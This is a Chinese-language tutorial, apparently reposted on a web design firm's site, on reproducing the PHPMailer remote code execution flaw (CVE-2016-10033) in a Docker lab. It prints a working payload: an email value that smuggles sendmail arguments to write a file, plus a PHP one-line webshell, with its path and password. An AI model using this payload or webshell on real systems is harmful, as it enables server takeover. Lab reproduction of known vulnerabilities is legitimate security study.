PHPMailer中怎么復現遠程命令執行漏洞,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
我們提供的服務有:成都網站設計、成都網站建設、微信公眾號開發、網站優化、網站認證、湖里ssl等。為上千多家企事業單位解決了網站和推廣的問題。提供周到的售前咨詢和貼心的售后服務,是有科學管理、有技術的湖里網站制作公司
PHPMailer是PHP電子郵件創建及傳輸類,用于多個開源項目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未經身份驗證的遠程攻擊者在Web服務器用戶上下文中執行任意代碼,遠程控制目標web應用。
PHPMailer<5.2.18
Docker環境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去鏡像啟動環境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬:<?php@eval($_POST['thelostworld']);?>
上傳完一句話木馬后,頁面會響應3-5分鐘,響應時間較長
木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld
虛擬終端:
使用腳本:
獲取腳本后臺回復“PHPMailer”獲取腳本
看完上述內容,你們掌握PHPMailer中怎么復現遠程命令執行漏洞的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注創新互聯行業資訊頻道,感謝各位的閱讀!
文章標題:PHPMailer中怎么復現遠程命令執行漏洞
分享鏈接:http://m.2m8n56k.cn/article40/pccgho.html
成都網站建設公司_創新互聯,為您提供微信小程序、網站導航、標簽優化、用戶體驗、微信公眾號、企業建站
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:[email protected]。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯